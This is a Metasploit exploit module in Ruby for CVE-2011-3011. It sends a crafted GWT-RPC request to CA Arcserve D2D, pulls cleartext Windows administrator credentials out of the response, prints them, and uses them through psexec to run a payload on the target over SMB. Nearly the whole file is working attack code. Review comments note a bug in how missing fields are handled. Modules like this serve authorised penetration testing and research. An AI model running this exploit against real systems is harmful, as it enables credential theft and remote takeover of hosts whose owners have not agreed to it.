Path: blob/master/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# CA Arcserve D2D r15 GWT-RPC credential disclosure (CVE-2011-3011).
#
# Flow: one POST to the homepage GWT-RPC servlet, parse the Windows
# credentials out of the raw response, record the service, then hand the
# credentials to a child windows/smb/psexec instance and record the login
# outcome (SUCCESSFUL / INCORRECT) via create_credential_and_login.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  # Module metadata and options. Only RPORT is registered here (default 8014,
  # the D2D web service port); RHOST, payload and LHOST/LPORT come from the
  # framework options inherited from Msf::Exploit::Remote / HttpClient.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CA Arcserve D2D GWT RPC Credential Information Disclosure',
        'Description' => %q{
          This module exploits an information disclosure vulnerability in the CA Arcserve
          D2D r15 web server. The information disclosure can be triggered by sending a
          specially crafted RPC request to the homepage servlet. This causes CA Arcserve to
          disclosure the username and password in cleartext used for authentication. This
          username and password pair are Windows credentials with Administrator access.
        },
        'Author' => [
          'bannedit', # metasploit module
          'rgod', # original public exploit
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2011-3011' ],
          [ 'OSVDB', '74162' ],
          [ 'EDB', '17574' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process'
        },
        # The payload ends up running through psexec, so it executes as the
        # disclosed (administrative) account.
        'Privileged' => true,
        'Payload' => {
          'Space' => 1000,
          'BadChars' => "\x00\x0d\x0a"
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Automatic', {} ],
        ],
        'DisclosureDate' => '2011-07-25',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8014),
      ]
    )
  end

  # Service details attached to the credential/login records created in
  # #exploit. The login is recorded against SMB on 445 (the service the
  # child psexec module authenticates to) rather than against the HTTP port
  # the disclosure was read from; the HTTP service itself is recorded
  # separately with report_service.
  #
  # @return [Hash] the mixin's service details merged with the SMB fields
  def service_details
    super.merge({
      port: 445,
      service_name: 'smb',
      post_reference_name: self.refname,
      last_attempted_at: DateTime.now
    })
  end

  # Sends the GWT-RPC request, extracts the disclosed credentials, reports
  # them, and attempts an SMB login with them via windows/smb/psexec.
  #
  # Fails with Failure::NotFound when the server does not answer or when the
  # response carries neither a "user" nor a "password" field.
  def exploit
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")

    # GWT-RPC request body: protocol fields, the module base URL, the
    # serialization policy strong name, the service interface and the
    # getLocalHost method. The "http://RHOST:RPORT" is what the server
    # expects as the module base; it is built from the datastore, not from
    # any response.
    data = "5|0|4|"
    data << "http://#{datastore['RHOST']}:#{datastore['RPORT']}"
    data << "/contents/"
    data << "|2C6B33BED38F825C48AE73C093241510|"
    data << "com.ca.arcflash.ui.client.homepage.HomepageService"
    data << "|getLocalHost|1|2|3|4|0|"

    cookie = "donotshowgettingstarted=%7B%22state%22%3Atrue%7D"

    # On the wire this is a POST to /contents/service/homepage with
    # Content-Type text/x-gwt-rpc -- the request shape a web-log or IDS rule
    # for this issue would key on. The second argument (5) is the response
    # timeout in seconds.
    res = send_request_raw({
      'uri' => '/contents/service/homepage',
      'version' => '1.1',
      'method' => 'POST',
      'cookie' => cookie,
      'data' => data,
      'headers' =>
      {
        'Content-Type' => "text/x-gwt-rpc; charset=utf-8",
        'Content-Length' => data.length
      }
    }, 5)

    if not res
      fail_with(Failure::NotFound, 'The server did not respond to our request')
    end

    # The whole raw response (status line, headers and body) is split on
    # commas; the credential values are expected to be the elements directly
    # following the literal "user" and "password" tokens.
    resp = res.to_s.split(',')

    user_index = resp.index("\"user\"")
    pass_index = resp.index("\"password\"")

    # NOTE(review): this only aborts when BOTH tokens are absent. A response
    # containing "password" but not "user" gets past this check with
    # user_index == nil, and `user_index + 1` below raises NoMethodError.
    if user_index.nil? and pass_index.nil?
      # Not a vulnerable server (blank user/pass doesn't help us)
      fail_with(Failure::NotFound, 'The server did not return credentials')
    end

    # Strip the surrounding JSON quotes from the values. A missing password
    # field yields an empty password rather than an abort.
    user = resp[user_index + 1].gsub(/\"/, "")
    pass = ""

    if pass_index
      pass = resp[pass_index + 1].gsub(/\"/, "")
    end

    # Record the HTTP service the disclosure was read from; the Server
    # header (if any) becomes the service info string.
    srvc = {
      :host => datastore['RHOST'],
      :port => datastore['RPORT'],
      :proto => 'tcp',
      :name => 'http',
      :info => res.headers['Server'] || ""
    }
    report_service(srvc)
    # NOTE(review): gsub always returns a String and pass defaults to "", so
    # neither value can be nil here; this guard is effectively unreachable.
    if user.nil? or pass.nil?
      print_error("Failed to collect the username and password")
      return
    end

    print_good("Collected credentials User: '#{user}' Password: '#{pass}'")

    # try psexec on the remote host
    # A child module instance is created and parented to this one so its
    # output and session bookkeeping flow through this module.
    psexec = framework.exploits.create("windows/smb/psexec")
    psexec.register_parent(self)

    psexec.datastore['PAYLOAD'] = self.datastore['PAYLOAD']

    # Only forward the listener settings when both are set, so a
    # half-configured handler is not copied into the child.
    if self.datastore['LHOST'] and self.datastore['LPORT']
      psexec.datastore['LHOST'] = self.datastore['LHOST']
      psexec.datastore['LPORT'] = self.datastore['LPORT']
    end

    psexec.datastore['RHOST'] = self.datastore['RHOST']

    # The child's payload handler is disabled; presumably the `handler`
    # call at the end of this method is meant to service the connection
    # instead -- confirm against the psexec module's handling.
    psexec.datastore['DisablePayloadHandler'] = true
    psexec.datastore['SMBPass'] = pass
    psexec.datastore['SMBUser'] = user

    print_status("Attempting to login via windows/smb/psexec")

    # this is kind of nasty would be better to split psexec code out to a mixin (on the TODO List)
    # Bare rescue catches StandardError only; any failure from the child
    # module is treated as a failed login, the credential is stored with
    # status INCORRECT, and this module returns without calling `handler`.
    begin
      psexec.exploit_simple(
        'LocalInput' => self.user_input,
        'LocalOutput' => self.user_output,
        'Payload' => psexec.datastore['PAYLOAD'],
        'RunAsJob' => true
      )
    rescue
      credential_data = {
        user: user,
        private_data: pass,
        status: Metasploit::Model::Login::Status::INCORRECT
      }.merge(service_details)
      create_credential_and_login(credential_data)

      print_error("Login attempt using windows/smb/psexec failed")
      print_status("Credentials have been stored and may be useful for authentication against other services.")
      # report the auth
      return
    end

    # report the auth
    # No exception from the child: record the same credential as a
    # SUCCESSFUL login against the SMB service from #service_details.
    credential_data = {
      user: user,
      private_data: pass,
      status: Metasploit::Model::Login::Status::SUCCESSFUL
    }.merge(service_details)
    create_credential_and_login(credential_data)

    handler
  end
end